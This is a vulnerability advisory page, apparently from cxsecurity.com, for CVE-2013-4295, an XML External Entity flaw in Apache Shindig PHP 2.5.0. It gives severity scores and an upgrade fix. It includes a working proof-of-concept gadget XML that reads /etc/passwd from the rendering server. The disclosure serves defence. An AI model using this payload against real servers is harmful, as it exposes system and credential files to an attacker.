Apache Shindig 2.5.0 XXE vulnerability

2013.10.22
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP) Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Shindig PHP 2.5.0 Description: The gadget renderer in the PHP version of Apache Shindig is subject to an XML External Entity (XXE) Injection attack. The vulnerability allows a malicious gadget author to construct paths to content on the gadget rendering server which in turn will display the content in the gadget iframe. Mitigation: 2.5.0 users should upgrade to 2.5.0-update1. Example: The following gadget XML demonstrates the issue. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> <ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> </ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module> After rendering this gadget you will see the content of /etc/passwd in the gadget iframe. Credit: This issue was discovered by Kousuke Ebihara. References: http://shindig.apache.org/security.html

References:

http://shindig.apache.org/security.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top